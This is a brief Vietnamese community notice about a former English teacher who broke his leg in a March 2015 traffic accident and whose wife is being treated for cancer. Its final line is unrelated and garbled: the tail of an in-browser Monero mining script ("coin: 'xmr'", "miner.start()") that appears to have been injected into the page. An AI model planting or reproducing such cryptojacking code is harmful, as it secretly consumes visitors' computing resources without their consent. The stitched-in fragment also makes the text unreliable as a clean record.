Thông báo

Thông báo
Thầy Huỳnh Ngọc Như Hoa , cựu giáo viên dạy Anh Văn Trường Nông Lâm Súc Định Tường  vừa mới bị tai nạn giao thông ngày 20 tháng 03 năm 2015. Thầy bị gãy chân trái, hiện nay Thầy đang nghỉ dưỡng tại tư gia ( Tân Mỹ Chánh- Mỹ Tho). Vợ thầy hiện đang điều trị bệnh ung thư tại  bệnh viện Mỹ Tho.
 Ban Liên Lạc NLS ĐT- BT đã thăm thầy ngày 22/3/2015.
Chúc thầy cô sớm bình phục

 

Thầy Huỳnh Ngọc Như Hoa bị gảy chân trái.
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();